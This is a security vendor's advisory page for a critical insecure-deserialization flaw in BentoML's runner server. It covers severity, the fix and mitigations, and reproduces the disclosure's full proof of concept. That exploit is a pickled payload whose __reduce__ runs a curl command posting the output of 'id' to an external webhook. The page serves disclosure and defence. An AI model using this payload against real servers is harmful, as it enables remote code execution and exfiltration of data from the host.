How severe is GHSA-7v4r-c989-xh26?

GHSA-7v4r-c989-xh26 has a CVSS score of 9.8/10, rated CRITICAL. Immediate patching is strongly recommended.

Which packages are affected by GHSA-7v4r-c989-xh26?

GHSA-7v4r-c989-xh26 affects the following packages: bentoml (PyPI). Ecosystems affected: PyPI.

How do I fix GHSA-7v4r-c989-xh26?

Update bentoml to 1.4.8 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7v4r-c989-xh26 is resolved across your whole dependency graph.

How do I detect GHSA-7v4r-c989-xh26 in my PyPI dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for bentoml. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-7v4r-c989-xh26 if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-7v4r-c989-xh26?

O3 pinpoints whether GHSA-7v4r-c989-xh26 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-7v4r-c989-xh26 actively exploited in the wild?

Yes. There are 1 known exploit references for GHSA-7v4r-c989-xh26, including . All exploit code should only be run in an isolated sandbox environment for research or authorized testing — never against production systems without explicit written authorization.

What is the EPSS score for GHSA-7v4r-c989-xh26?

GHSA-7v4r-c989-xh26 has an EPSS (Exploit Prediction Scoring System) score of 43.8%, placing it in the 99th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score warrants monitoring and prompt remediation.

What type of vulnerability is GHSA-7v4r-c989-xh26?

GHSA-7v4r-c989-xh26 is classified as Deserialization of Untrusted Data (CWE-502). This weakness type describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation. This is a high-impact weakness class that often enables remote code execution or data exposure.

When was GHSA-7v4r-c989-xh26 published, and has it been updated?

GHSA-7v4r-c989-xh26 was published on April 9, 2025 and was last updated on June 10, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐍 PyPI

GHSA-7v4r-c989-xh26

CRITICAL

BentoML's runner server Vulnerable to Remote Code Execution (RCE) via Insecure Deserialization

Also known asCVE-2025-32375PYSEC-2025-32

Published

Apr 9, 2025

Updated

Jun 10, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

1 known

EPSS Exploitation Probability

via FIRST.org ↗

43.8%probability of exploitation in next 30 days

High Risk99th percentile-21.43%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

🐍bentoml

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.

Description

Summary

There was an insecure deserialization in BentoML's runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server.

PoC

First, create a file named model.py to create a simple model and save it

import bentoml
import numpy as np

class mymodel:
    def predict(self, info):
        return np.abs(info)
    def __call__(self, info):
        return self.predict(info)

model = mymodel()
bentoml.picklable_model.save_model("mymodel", model)

Then run the following command to save this model

python3 model.py

Next, create bentofile.yaml to build this model

service: "service.py"  
description: "A model serving service with BentoML"  
python:
  packages:
    - bentoml
    - numpy
models:
  - tag: MyModel:latest  
include:
  - "*.py"

Then, create service.py to host this model

import bentoml
from bentoml.io import NumpyNdarray
import numpy as np


model_runner = bentoml.picklable_model.get("mymodel:latest").to_runner()

svc = bentoml.Service("myservice", runners=[model_runner])

async def predict(input_data: np.ndarray):

    input_columns = np.split(input_data, input_data.shape[1], axis=1)
    result_generator = model_runner.async_run(input_columns, is_stream=True)
    async for result in result_generator:
        yield result

Then, run the following commands to build and host this model

bentoml build
bentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888

Finally, run this below python script to exploit insecure deserialization vulnerability in BentoML's runner server.

import requests
import pickle

url = "http://0.0.0.0:8888/"

headers = {
    "args-number": "1",
    "Content-Type": "application/vnd.bentoml.pickled",
    "Payload-Container": "NdarrayContainer", 
    "Payload-Meta": '{"format": "default"}',
    "Batch-Size": "-1",
}

class P:
    def __reduce__(self):
        return  (__import__('os').system, ('curl -X POST -d "$(id)" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3',))

response = requests.post(url, headers=headers, data=pickle.dumps(P()))

print(response)

And I can replace the NdarrayContainer with PandasDataFrameContainer in Payload-Container header and the exploit still working. After running exploit.py then the output of the command id will be send out to the WebHook server.

Root Cause Analysis:

When handling a request in BentoML runner server in src/bentoml/_internal/server/runner_app.py, when the request header args-number is equal to 1, it will call the function _deserialize_single_param like the code below:

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298
async def _request_handler(request: Request) -> Response:
    assert self._is_ready

    arg_num = int(request.headers["args-number"])
    r_: bytes = await request.body()

    if arg_num == 1:
        params: Params[t.Any] = _deserialize_single_param(request, r_)

Then this is the function of _deserialize_single_param, which will take the value of all request headers of Payload-Container, Payload-Meta and Batch-Size and the crafted into Payload class which will contain the data from request.body

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393
def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
    container = request.headers["Payload-Container"]
    meta = json.loads(request.headers["Payload-Meta"])
    batch_size = int(request.headers["Batch-Size"])
    kwarg_name = request.headers.get("Kwarg-Name")
    payload = Payload(
        data=bs,
        meta=meta,
        batch_size=batch_size,
        container=container,
    )
    if kwarg_name:
        d = {kwarg_name: payload}
        params: Params[t.Any] = Params(**d)
    else:
        params: Params[t.Any] = Params(payload)

    return params

After crafting Params containing payload, it will call to function infer with params variable as input

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304
try:
  payload = await infer(params)

Inside function infer, the params variable with is belong to class Params will call the function map of that class with AutoContainer.from_payload as a parameter.

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289
async def infer(params: Params[t.Any]) -> Payload:
      params = params.map(AutoContainer.from_payload)

      try:
          ret = await runner_method.async_run(
              *params.args, **params.kwargs
          )
      except Exception:
          traceback.print_exc()
          raise

      return AutoContainer.to_payload(ret, 0)

Inside class Params define the function map which will call the AutoContainer.from_payload function with arguments, which are data, meta, batch_size and container

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66
def map(self, function: t.Callable[[T], To]) -> Params[To]:
    """
    Apply a function to all the values in the Params and return a Params of the
    return values.
    """
    args = tuple(function(a) for a in self.args)
    kwargs = {k: function(v) for k, v in self.kwargs.items()}
    return Params[To](*args, **kwargs)

Inside class AutoContainer class have defined the function from_payload which will find the class by the payload.container , which is the value of header Payload-Container, and it will call the function from_payload from the chosen class as return value

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712
def from_payload(cls, payload: Payload) -> t.Any:
    container_cls = DataContainerRegistry.find_by_name(payload.container)
    return container_cls.from_payload(payload)

And if the attacker set value of header Payload-Container to NdarrayContainer or PandasDataFrameContainer, it will call from_payload and when it then check if the payload.meta["format"] == "default" it will call pickle.loads(payload.data) and payload.meta["format"] is the value of header Payload-Meta and the attacker can set it to {"format": "default"} and payload.data is the value of request.body which is the payload from malicious class P in my request, which will trigger __reduce__ method and then execute arbitrary commands (for my example is the curl command)

https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416
def from_payload(
    cls,
    payload: Payload,
) -> ext.PdDataFrame:
    if payload.meta["format"] == "default":
        return pickle.loads(payload.data)
https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312
def from_payload(
    cls,
    payload: Payload,
) -> ext.NpNDArray:
    format = payload.meta.get("format", "default")
    if format == "default":
        return pickle.loads(payload.data)

Impact

In the above Proof of Concept, I have shown how the attacker can execute command id and send the output of the command to the outside. By replacing id command with any OS commands, this insecure deserialization in BentoML's runner server will grant the attacker the permission to gain the remote shell on the server and injecting backdoors to persist access.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
🐍PyPI	`bentoml`	≥ 1.0.0a1&&< 1.4.8	1.4.8

Exploits & PoCs

Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.

theGEBIRGE/CVE-2025-32375

This repository includes everything needed to run a PoC exploit for CVE-

⭐ 3🍴 1May 2025

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for bentoml. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update bentoml to 1.4.8 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-7v4r-c989-xh26 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-7v4r-c989-xh26 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-7v4r-c989-xh26. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary There was an insecure deserialization in BentoML's runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server. ### PoC - First, create a file named **model.py** to create a simple model and save it ``` import bentoml import numpy as np class mymodel: def predict(self, info): return np.abs(info) def __call__(self, info): return self.predict(info) model = mymodel() be

O3 Security · Impact-Aware SCA

Is GHSA-7v4r-c989-xh26 in your dependencies?

O3 detects GHSA-7v4r-c989-xh26 across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works